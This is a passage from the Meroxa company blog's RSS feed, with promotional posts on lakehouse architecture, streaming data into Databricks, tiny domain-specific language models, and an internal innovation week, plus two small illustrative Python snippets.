&lt;/ul&gt;</content:encoded></item><item><title><![CDATA[Why the Lakehouse Is Replacing the Outdated Data Warehouse for Real-Time Streaming]]></title><description><![CDATA[Traditional data warehouses, long the cornerstone of analytics, are increasingly ill-equipped to meet the demands of today’s real-time, dynamic data needs. Enter the Lakehouse: an innovative architecture that blends the flexibility of data lakes with the robust querying capabilities of warehouses, seamlessly handling structured and unstructured data for real-time analytics. This blog explores the shortcomings of legacy systems, the transformative benefits of Lakehouses, and how Meroxa simplifies the journey with its intuitive tools, real-time data pipelines, and cloud-native scalability. From leveraging cutting-edge technologies like Apache Iceberg and Delta Lake to providing expert migration support, Meroxa empowers organizations to unlock faster, more flexible insights without the complexity or high costs of traditional solutions.]]></description><link>https://meroxa.com/blog/why-the-lakehouse-is-replacing-the-outdated-data-warehouse-for-real-time-streaming</link><guid isPermaLink="false">https://meroxa.com/blog/why-the-lakehouse-is-replacing-the-outdated-data-warehouse-for-real-time-streaming</guid><dc:creator><![CDATA[DeVaris Brown]]></dc:creator><pubDate>Fri, 20 Dec 2024 07:28:00 GMT</pubDate><content:encoded>&lt;p&gt;Data warehouses have been at the heart of analytics for decades, helping organizations make sense of their data. While these systems excel at handling static, structured datasets, they struggle to meet the dynamic needs of today&apos;s data-driven teams—especially when it comes to real-time streaming data.&lt;/p&gt;
&lt;p&gt;That&apos;s where the Lakehouse comes in. Think of it as the best of both worlds: it combines data lakes&apos; flexibility with traditional warehouses&apos; powerful querying capabilities. This innovative architecture easily handles dynamic, unstructured, and semi-structured data, making real-time analytics a breeze.&lt;/p&gt;
&lt;p&gt;At &lt;strong&gt;Meroxa&lt;/strong&gt;, we&apos;re here to be your trusted partner in this journey. We know that embracing new technology can feel like a big step, so we&apos;ve created friendly tools and services to make your transition to the Lakehouse smooth and worry-free. Let&apos;s explore together why Lakehouses are the future and how Meroxa can help you get there.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Let&apos;s Talk About Why Data Warehouses Are Holding You Back&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;img src=&quot;https://www.meroxa.com/img/dkeeton_17415_picture_of_data_warehouse_architecture2.png&quot; alt=&quot;Traditional data warehouse architecture&quot;&gt;
&lt;strong&gt;1. Stuck in the Batch Processing Stone Age&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Look, I hate to break it to you, but data warehouses are living in the past. They were brilliant for their time, but trying to handle today&apos;s lightning-fast data streams with batch processing? That&apos;s like trying to drink from a fire hose with a coffee cup. And those ETL pipelines you&apos;re relying on? They&apos;re turning your real-time data into yesterday&apos;s news.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;2. The Money Pit of Scaling&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Here&apos;s an uncomfortable truth: scaling your data warehouse for streaming is probably costing you a small fortune. Those proprietary solutions aren&apos;t just expensive—they&apos;re highway robbery. And let&apos;s be honest about resource provisioning: you&apos;re either wasting money on unused capacity or crossing your fingers hoping your system doesn&apos;t crash during peak times. Neither is a great look, right?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;3. Square Peg, Round Hole: The Structured Data Dilemma&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Let&apos;s get real—your data doesn&apos;t arrive in perfect little packages anymore. It&apos;s messy, it&apos;s diverse, and it&apos;s constantly evolving. Yet here we are, forcing JSON, logs, and IoT data through the equivalent of a data strainer just to make it warehouse-friendly. Spoiler alert: there&apos;s a better way, and it&apos;s called a Lakehouse.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;The Lakehouse Revolution&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Let me share something exciting: Lakehouses are transforming how we handle data, especially when it comes to real-time streaming. Here&apos;s why this matters for your business.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;1. Unified Architecture&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Imagine having all your data—structured and unstructured—working together seamlessly in one place. That&apos;s what Lakehouses deliver. They process your data in real-time, without the delays of traditional ETL processes that can slow you down.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;2. Real-Time Analytics at Scale&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Thanks to innovative table formats like Apache Iceberg, Delta Lake, and Apache Hudi, you&apos;ll get lightning-fast insights from your streaming data. Here&apos;s what makes this technology special:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Concurrency&lt;/strong&gt;: Your entire team can work with the data simultaneously—no more waiting your turn.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Time Travel&lt;/strong&gt;: Need to look back at yesterday&apos;s data? No problem. Track changes and audit with ease.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Schema Evolution&lt;/strong&gt;: As your data needs change, your system adapts smoothly, keeping your operations running without interruption.&lt;/li&gt;
&lt;/ul&gt;
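&lt;p&gt;To make &quot;time travel&quot; concrete, here is a minimal Python sketch of the idea behind it: every commit creates an immutable snapshot, so older versions of the table remain queryable. This is an illustration of the concept only, not how Iceberg, Delta Lake, or Hudi are actually implemented.&lt;/p&gt;

```python
from dataclasses import dataclass, field

@dataclass
class SnapshotTable:
    """Toy table that keeps every committed version, so any past
    state can be read back -- the idea behind 'time travel' in
    formats like Apache Iceberg and Delta Lake."""
    snapshots: list = field(default_factory=list)  # immutable row-sets

    def commit(self, rows):
        # Each commit appends a new immutable snapshot instead of
        # overwriting data in place.
        self.snapshots.append(tuple(rows))
        return len(self.snapshots) - 1  # snapshot/version id

    def read(self, version=None):
        # Default: latest snapshot; pass a version id to time-travel.
        if not self.snapshots:
            return ()
        if version is None:
            version = len(self.snapshots) - 1
        return self.snapshots[version]

table = SnapshotTable()
v0 = table.commit([{"id": 1, "status": "new"}])
v1 = table.commit([{"id": 1, "status": "shipped"}])

print(table.read())    # current state
print(table.read(v0))  # "yesterday's" state, still intact
```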
&lt;p&gt;&lt;strong&gt;3. Open Standards, Cloud-Native Flexibility&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Here&apos;s the best part: Lakehouses are built on open standards and cloud-native technology. This means you&apos;re not locked into any single vendor&apos;s ecosystem. You&apos;re free to choose the tools that work best for your team and adapt as your needs evolve.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;How Meroxa Makes Your Lakehouse Journey Simple&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;img src=&quot;https://www.meroxa.com/img/dkeeton_17415_picture_of_data_lake_architecture_technology3.png&quot; alt=&quot;Data lakehouse architecture&quot;&gt;
Ready to modernize your data architecture but feeling a bit overwhelmed? We get it. Moving to a Lakehouse involves several moving parts—but that&apos;s exactly why we&apos;re here to help you succeed.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;1. Your Real-Time Data Partner&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Think of Meroxa as your trusted guide in building &lt;strong&gt;real-time data pipelines&lt;/strong&gt;. We&apos;ve done the heavy lifting, creating a platform that turns complex data integration into a smooth, automated process. Your team can focus on what really matters: creating value from your data.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;2. Seamless Pipeline Management&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Our &lt;strong&gt;stream processing platform&lt;/strong&gt; takes care of everything—from data ingestion to transformation and delivery. Whether you choose Apache Iceberg, Delta Lake, or Apache Hudi, our pre-built connectors and intuitive interface make setup a breeze.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;3. Growth-Ready Architecture&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;As your data needs grow, we grow with you. Our cloud-native platform automatically scales to match your demands while keeping costs in check. No more worrying about infrastructure—we&apos;ve got you covered.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;4. Expert Migration Support&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Change can be challenging, but you&apos;re not alone. Our team of experts provides &lt;strong&gt;hands-on guidance&lt;/strong&gt; throughout your journey, from initial architecture design to final implementation. We&apos;re committed to your success every step of the way.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;5. Complete Visibility&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Stay in control with our &lt;strong&gt;comprehensive monitoring tools&lt;/strong&gt;. Track performance, spot potential issues early, and keep your data flowing smoothly. It&apos;s like having a mission control center for your data operations.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;Take the Next Step&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;The era of traditional data warehouses is coming to an end. Today&apos;s real-time data demands require a more agile, efficient approach—and that&apos;s exactly what the Lakehouse delivers.&lt;/p&gt;
&lt;p&gt;By combining the best of data lakes and warehouses with cutting-edge technology like Iceberg, Delta, and Hudi, the Lakehouse architecture opens up new possibilities for faster, more flexible data insights.&lt;/p&gt;
&lt;p&gt;Let Meroxa be your partner in this transformation. Whether you&apos;re starting fresh or upgrading from a legacy system, we have the expertise, tools, and support to make your transition successful. Don&apos;t let outdated technology hold you back—embrace the future of data architecture with Meroxa.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Ready to transform your data architecture? Schedule a &lt;a href=&quot;https://meroxa.com/contact/sales/&quot;&gt;demo&lt;/a&gt; today and see how Meroxa can accelerate your success.&lt;/strong&gt;&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Real-Time Analytics with Databricks and Meroxa's Conduit Platform AI]]></title><description><![CDATA[Discover how Meroxa's Conduit Platform AI empowers businesses to seamlessly integrate real-time data into Databricks for faster, smarter analytics. Learn how our platform reduces engineering effort by 60%, accelerates insights by 40%, and ensures 99.9% uptime with near-zero latency. From financial transactions to IoT data, this blog explores how Meroxa’s AI-driven pipelines simplify data movement, enabling you to unlock the full potential of Databricks for real-time decision-making.]]></description><link>https://meroxa.com/blog/real-time-analytics-with-databricks-and-meroxas-conduit-platform-ai</link><guid isPermaLink="false">https://meroxa.com/blog/real-time-analytics-with-databricks-and-meroxas-conduit-platform-ai</guid><dc:creator><![CDATA[Dion Keeton]]></dc:creator><pubDate>Thu, 19 Dec 2024 22:14:00 GMT</pubDate><content:encoded>&lt;p&gt;With the current state of data, businesses need real-time analytics to make faster, smarter decisions. While &lt;strong&gt;Databricks&lt;/strong&gt; excels in processing large datasets and enabling advanced analytics, the challenge lies in ensuring real-time, accurate, and reliable data integration. Enter &lt;strong&gt;Meroxa&apos;s Conduit Platform AI&lt;/strong&gt;, designed to simplify and optimize the flow of real-time data into Databricks with measurable advantages.&lt;/p&gt;
&lt;hr&gt;
&lt;h2&gt;&lt;strong&gt;The Challenge of Real-Time Analytics with Databricks&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;Databricks offers unparalleled analytics capabilities, but businesses face common hurdles when integrating real-time data:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Complexity of Integration&lt;/strong&gt;: Building pipelines for real-time data from diverse sources requires significant engineering effort.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;High Latency&lt;/strong&gt;: Slow data delivery can make real-time analytics impossible.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Scalability Issues&lt;/strong&gt;: Surging data volumes demand pipelines that can grow effortlessly.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Pipeline Maintenance&lt;/strong&gt;: Monitoring and troubleshooting pipelines take time and resources.&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;
&lt;h2&gt;&lt;strong&gt;How Meroxa&apos;s Conduit Platform AI Overcomes These Challenges&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/dkeeton_17415_analytics_with_databricks2.png&quot; alt=&quot;Real-time analytics with Databricks&quot;&gt;&lt;/p&gt;
&lt;p&gt;Meroxa&apos;s Conduit Platform AI provides a streamlined, scalable, and intelligent solution for real-time data integration with Databricks. Here’s how it delivers unique value:&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;1. Faster Time to Insights (Up to 40% Improvement)&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Conduit accelerates real-time data ingestion and processing, reducing pipeline setup and data delivery time by &lt;strong&gt;40%&lt;/strong&gt;, allowing Databricks users to act on insights faster than ever.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Automated Pipeline Creation&lt;/strong&gt;: Build pipelines in minutes, not days.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;AI-Driven Schema Adaptation&lt;/strong&gt;: Handles changes in data structure automatically, minimizing downtime.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong&gt;2. Reduced Engineering Effort (60% Cost Savings)&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Manual pipeline management consumes time and resources. Conduit eliminates &lt;strong&gt;60%&lt;/strong&gt; of the engineering effort needed for real-time data integration through AI automation.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Self-Healing Pipelines&lt;/strong&gt;: Detects and resolves issues without manual intervention.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Low-Code Interface&lt;/strong&gt;: Create and manage pipelines without deep coding expertise.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong&gt;3. Near-Zero Latency (Up to 30% Faster Delivery)&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Meroxa’s platform ensures data streams with near-zero latency, improving delivery speed by &lt;strong&gt;up to 30%&lt;/strong&gt; for real-time analytics in Databricks.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Optimized Connectors&lt;/strong&gt;: Pre-built, high-performance connectors for common data sources like Kafka, Postgres, and more.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Dynamic Data Routing&lt;/strong&gt;: Ensures low-latency streaming, even during peak data loads.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong&gt;4. Scalability and Resilience (99.9% Uptime)&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Conduit is designed to scale seamlessly as your data grows while maintaining &lt;strong&gt;99.9% uptime&lt;/strong&gt;, ensuring uninterrupted analytics in Databricks.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Horizontal Scaling&lt;/strong&gt;: Automatically adjusts to increased data volumes.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Load Balancing&lt;/strong&gt;: Distributes workloads efficiently to prevent bottlenecks.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong&gt;5. Proactive Monitoring and Visibility (50% Reduction in Downtime)&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Conduit’s real-time monitoring tools reduce pipeline downtime by &lt;strong&gt;50%&lt;/strong&gt;, giving you confidence in your data streams.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Live Dashboards&lt;/strong&gt;: Monitor pipeline performance at a glance.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Proactive Alerts&lt;/strong&gt;: Receive notifications before issues impact your analytics.&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;
&lt;h2&gt;&lt;strong&gt;Use Case: Streaming Financial Transactions into Databricks&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;A fintech company processes millions of financial transactions daily and uses Databricks for fraud detection and customer insights.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Challenges&lt;/strong&gt;:&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Integrating real-time transaction data from multiple sources.&lt;/li&gt;
&lt;li&gt;Maintaining low latency to detect fraud as it happens.&lt;/li&gt;
&lt;li&gt;Ensuring scalability during peak transaction periods.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong&gt;Solution with Meroxa Conduit Platform AI&lt;/strong&gt;:&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;40% Faster Time to Insights&lt;/strong&gt;: Real-time data from transactions is streamed into Databricks instantly, enabling near-instant fraud detection.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;60% Less Engineering Effort&lt;/strong&gt;: Automated pipelines save engineering resources, allowing teams to focus on fraud analytics.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;99.9% Uptime&lt;/strong&gt;: Ensures uninterrupted data flow, even during high transaction periods.&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;
&lt;h2&gt;&lt;strong&gt;Unlock the Power of Real-Time Analytics&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/dkeeton_17415_analytics_with_databricks3.png&quot; alt=&quot;Real-time analytics with Databricks&quot;&gt;&lt;/p&gt;
&lt;p&gt;By combining &lt;strong&gt;Databricks’ analytics capabilities&lt;/strong&gt; with the automation and intelligence of &lt;strong&gt;Meroxa’s Conduit Platform AI&lt;/strong&gt;, businesses can achieve faster, smarter, and more reliable real-time insights. Whether you&apos;re processing financial transactions, IoT data, or user behavior, our platform ensures that your analytics pipelines are optimized for success.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Start your real-time analytics journey today with Meroxa.&lt;/strong&gt; &lt;a href=&quot;https://meroxa.com/contact/sales/&quot;&gt;Sign up&lt;/a&gt; to see how we can transform your data strategy.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Why Bigger Isn’t Always Better: The Case for Ditching LLMs in Favor of Tiny Models Powered by Real-Time Data]]></title><description><![CDATA[In the rapidly evolving world of AI, businesses are discovering that the future lies not in massive, general-purpose language models (LLMs) but in tiny, specialized models powered by real-time data streams. These domain-specific models offer dramatic cost savings, enhanced accuracy, and reduced hallucinations by continuously learning from live business data. From customer support to financial services and supply chain management, tiny models excel in delivering precise, actionable insights tailored to specific operations. Powered by platforms like Meroxa, which enables robust real-time data infrastructure, this approach bridges the gap between AI capabilities and business needs, providing a sustainable, efficient path to enterprise AI innovation.]]></description><link>https://meroxa.com/blog/why-bigger-isnt-always-better-the-case-for-ditching-llms-in-favor-of-tiny-models-powered-by-real-time-data</link><guid isPermaLink="false">https://meroxa.com/blog/why-bigger-isnt-always-better-the-case-for-ditching-llms-in-favor-of-tiny-models-powered-by-real-time-data</guid><dc:creator><![CDATA[DeVaris Brown]]></dc:creator><pubDate>Wed, 18 Dec 2024 23:17:00 GMT</pubDate><content:encoded>&lt;p&gt;As the CEO of Meroxa, I&apos;ve had a front-row seat to the AI revolution sweeping through the enterprise technology. Companies that just came to grips with having to become a data company are now scrambling to leverage AI to optimize huge parts of their business. 
While large language models (LLMs) like GPT-4, Claude, Llama, and Gemini have captured the public imagination, I&apos;m increasingly convinced that the future of practical AI applications lies in a different direction: tiny, specialized language models powered by real-time data streams.&lt;/p&gt;
&lt;h2&gt;The Hidden Costs of Large Language Models&lt;/h2&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/dkeeton_17415_llm_data_models.png&quot; alt=&quot;LLM data models&quot;&gt;&lt;/p&gt;
&lt;p&gt;Let&apos;s be frank: LLMs are impressive, but they come with significant drawbacks. Training these models requires massive computational resources, with costs running into millions of dollars. They consume enormous amounts of energy, making them environmentally questionable. And despite their size, they still struggle with hallucinations – those confident but incorrect responses that can wreak havoc in business applications.&lt;/p&gt;
&lt;p&gt;But perhaps most importantly, LLMs are fundamentally disconnected from your business&apos;s current reality. They&apos;re trained on historical internet data, not your organization&apos;s live, operational data. This disconnect creates a critical gap between AI capabilities and business needs.&lt;/p&gt;
&lt;h2&gt;The Tiny Model Advantage&lt;/h2&gt;
&lt;p&gt;This is where tiny language models shine. By &quot;tiny,&quot; I mean models that are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Trained on specific domains rather than attempting to know everything&lt;/li&gt;
&lt;li&gt;Updated continuously with real-time data streams&lt;/li&gt;
&lt;li&gt;Optimized for specific business tasks rather than general-purpose conversation&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The advantages are compelling:&lt;/p&gt;
&lt;h3&gt;1. Reduced Hallucinations Through Real-Time Data&lt;/h3&gt;
&lt;p&gt;Tiny models trained on current, streaming data are less likely to hallucinate because they&apos;re working with fresh, relevant information. When your model is continuously updated with real-time data from your actual business operations, it doesn&apos;t need to &quot;fill in the gaps&quot; with potentially incorrect information.&lt;/p&gt;
&lt;h3&gt;2. Dramatic Cost Reduction&lt;/h3&gt;
&lt;p&gt;The economics are straightforward. Training a tiny model on a specific domain requires:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Significantly less computational power&lt;/li&gt;
&lt;li&gt;Smaller training datasets&lt;/li&gt;
&lt;li&gt;Shorter training times&lt;/li&gt;
&lt;li&gt;Lower ongoing operational costs&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We&apos;ve seen organizations reduce their AI training costs by 90% or more by switching to domain-specific tiny models.&lt;/p&gt;
&lt;h3&gt;3. Improved Relevancy and Accuracy&lt;/h3&gt;
&lt;p&gt;When your model is focused on a specific domain and continuously updated with real-time data, it becomes remarkably accurate within its scope. Instead of being &quot;okay&quot; at everything, it becomes excellent at what matters to your business.&lt;/p&gt;
&lt;h2&gt;Real-World Applications&lt;/h2&gt;
&lt;p&gt;Consider a few scenarios where tiny models excel:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Customer Support&lt;/strong&gt;: Instead of using a general-purpose LLM, deploy a tiny model trained specifically on your product documentation, support tickets, and real-time customer interactions. The model stays current with product updates and emerging issues.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Financial Services&lt;/strong&gt;: Rather than relying on an LLM&apos;s outdated knowledge, use a tiny model that continuously learns from market data, transaction patterns, and regulatory updates.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Supply Chain Operations&lt;/strong&gt;: Deploy models that understand your specific inventory, logistics, and supplier relationships, updated in real-time as conditions change.&lt;/p&gt;
&lt;h2&gt;The Hybrid Approach&lt;/h2&gt;
&lt;p&gt;This isn&apos;t to say that LLMs don&apos;t have their place. A hybrid approach often works best:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Use LLMs for broad, creative tasks where general knowledge is valuable&lt;/li&gt;
&lt;li&gt;Deploy tiny models for specific, business-critical operations where accuracy and currentness are paramount&lt;/li&gt;
&lt;li&gt;Leverage both in combination where appropriate&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;The Critical Role of Data Streams&lt;/h2&gt;
&lt;p&gt;Here&apos;s where the rubber meets the road: tiny models are only as good as the data they&apos;re trained on. The key to success is having robust, reliable data streams that can:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Capture real-time business events&lt;/li&gt;
&lt;li&gt;Clean and prepare data automatically&lt;/li&gt;
&lt;li&gt;Feed models continuously for training and updates&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This is why at Meroxa, we&apos;ve focused on building the infrastructure that makes this possible. Our platform enables organizations to create and manage the real-time data streams that power these next-generation AI systems.&lt;/p&gt;
&lt;h2&gt;Reference Architecture&lt;/h2&gt;
&lt;p&gt;To make this concrete, let&apos;s look at a reference architecture for implementing tiny language models with real-time data streams:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/mermaid-flow-1x.png&quot; alt=&quot;Reference architecture flow diagram&quot;&gt;&lt;/p&gt;
&lt;p&gt;This architecture shows how Meroxa serves as the foundation for real-time data processing that powers tiny language models. Let&apos;s break down the key components:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Data Ingestion&lt;/strong&gt;: Meroxa handles real-time data capture from various sources, ensuring no valuable information is lost.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Stream Processing&lt;/strong&gt;: Our Turbine engine processes and transforms data in real-time, preparing it for model consumption.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Data Storage&lt;/strong&gt;: A multi-tiered approach combines historical data for training with hot data for real-time inference.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;ML Pipeline&lt;/strong&gt;: Continuous training and evaluation ensure models stay current and accurate.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Monitoring&lt;/strong&gt;: Comprehensive monitoring helps detect data drift and trigger model updates when needed.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The beauty of this architecture is its ability to maintain model freshness while managing computational resources efficiently.&lt;/p&gt;
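&lt;p&gt;As a rough sketch of how these components fit together, here is the ingest-clean-buffer-train loop in plain Python. The model, the cleaning rule, and the batching are illustrative stand-ins, not Meroxa or Turbine APIs.&lt;/p&gt;

```python
import statistics

def clean(event):
    # Stand-in for stream processing: drop malformed events.
    return event if isinstance(event.get("value"), (int, float)) else None

class TinyModel:
    """Stand-in 'tiny model': tracks values it can score against."""
    def __init__(self):
        self.history = []
    def update(self, batch):
        # Continuous training: fold each fresh batch into the model.
        self.history.extend(e["value"] for e in batch)
    def predict(self):
        return statistics.mean(self.history) if self.history else 0.0

def run_pipeline(stream, model, batch_size=3):
    batch = []
    for event in stream:                 # 1) data ingestion
        event = clean(event)             # 2) stream processing
        if event is None:
            continue
        batch.append(event)              # 3) hot-data buffer
        if len(batch) >= batch_size:     # 4) continuous training
            model.update(batch)
            batch.clear()
    if batch:                            # flush the trailing partial batch
        model.update(batch)
    return model

stream = [
    {"value": 10}, {"value": 12}, {"value": "bad"},
    {"value": 11}, {"value": 13},
]
model = run_pipeline(iter(stream), TinyModel())
print(model.predict())  # mean of the cleaned values
```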
&lt;h2&gt;Getting Started&lt;/h2&gt;
&lt;p&gt;The path to implementing tiny models in your organization starts with your data infrastructure. Here&apos;s what you need:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Identify the specific domains where AI could add value&lt;/li&gt;
&lt;li&gt;Map out your data sources and streams&lt;/li&gt;
&lt;li&gt;Set up real-time data pipelines (this is where Meroxa comes in)&lt;/li&gt;
&lt;li&gt;Start small with a focused model in one domain&lt;/li&gt;
&lt;li&gt;Measure results and iterate&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;The Path Forward&lt;/h2&gt;
&lt;p&gt;As AI continues to evolve, the winners won&apos;t be those with the biggest models, but those with the most relevant ones. The combination of tiny models and real-time data streams represents a more sustainable, efficient, and effective approach to enterprise AI.&lt;/p&gt;
&lt;p&gt;Ready to explore how tiny models could transform your organization? Let&apos;s talk about how Meroxa can help you build the real-time data infrastructure that makes it possible. &lt;a href=&quot;https://meroxa.com/contact/sales/&quot;&gt;Sign up&lt;/a&gt;&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Champagne Week: Driving Innovation and Collaboration at Meroxa]]></title><description><![CDATA[Champagne Week embodies the creativity, dedication, and collaboration of the Meroxa team, showcasing innovative projects like enhanced documentation, real-time IoT processing, AI-powered summarization, and a collaborative demo that highlights our growth. Thank you to everyone who contributed to making this week a success—and to our users, who inspire us to keep raising the bar.]]></description><link>https://meroxa.com/blog/champagne-week-driving-innovation-and-collaboration-at-meroxa</link><guid isPermaLink="false">https://meroxa.com/blog/champagne-week-driving-innovation-and-collaboration-at-meroxa</guid><dc:creator><![CDATA[Dion Keeton]]></dc:creator><pubDate>Mon, 16 Dec 2024 16:04:00 GMT</pubDate><content:encoded>&lt;p&gt;At Meroxa, we celebrate innovation and teamwork during Champagne Week—a time when our team comes together to deliver impactful updates and enhancements. This year was no exception, featuring exciting projects that advance the Conduit platform and its ecosystem. Here’s a detailed look at the highlights from this year’s Champagne Week.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;1. Automated Connector Status Page&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;This project introduced a new &lt;strong&gt;Doctor Page&lt;/strong&gt; to streamline how we monitor and maintain our connectors. Previously, the Conduit team manually reviewed connectors to ensure they aligned with the latest versions of libraries and workflows. This project automates that process, offering a clearer and more efficient way to identify where attention is needed.&lt;/p&gt;
&lt;h3&gt;Key Features:&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Automated Checks:&lt;/strong&gt; The tool uses an existing weekly workflow to update the connector inventory and highlight connectors needing updates.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Focus on Latest Releases:&lt;/strong&gt; Reduces noise by fetching only the latest relevant versions, so outdated, pre-existing update requests are skipped.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Clear Connector Statuses:&lt;/strong&gt; Provides an easy-to-read interface showing where action is required.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Future Improvements:&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;Introduce a &quot;mild&quot; status (orange) for connectors that use the same major and minor versions but not the latest patch.&lt;/li&gt;
&lt;li&gt;Enable URL updates based on filters for better shareability.&lt;/li&gt;
&lt;li&gt;Add additional fields like the number of open issues or pull requests.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;To see the tool in action, visit: &lt;a href=&quot;https://conduit-doctor.conduit-site.pages.dev/doctor/&quot;&gt;Conduit Doctor Page&lt;/a&gt; and &lt;a href=&quot;https://youtu.be/ffBGI3yedzA&quot;&gt;Watch the demo&lt;/a&gt;.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;2. Automated Document Summarization with Conduit, OpenAI, and Weaviate&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;a href=&quot;https://github.com/ConduitIO/conduit/pull/2008&quot;&gt;Pull Request #2008&lt;/a&gt; introduced an automated pipeline for ingesting, processing, and summarizing documents. Using Conduit’s documentation as a dataset, this system leverages OpenAI and Weaviate to generate context-rich summaries.&lt;/p&gt;
&lt;h3&gt;Highlights:&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Pipeline Overview:&lt;/strong&gt;
&lt;ul&gt;
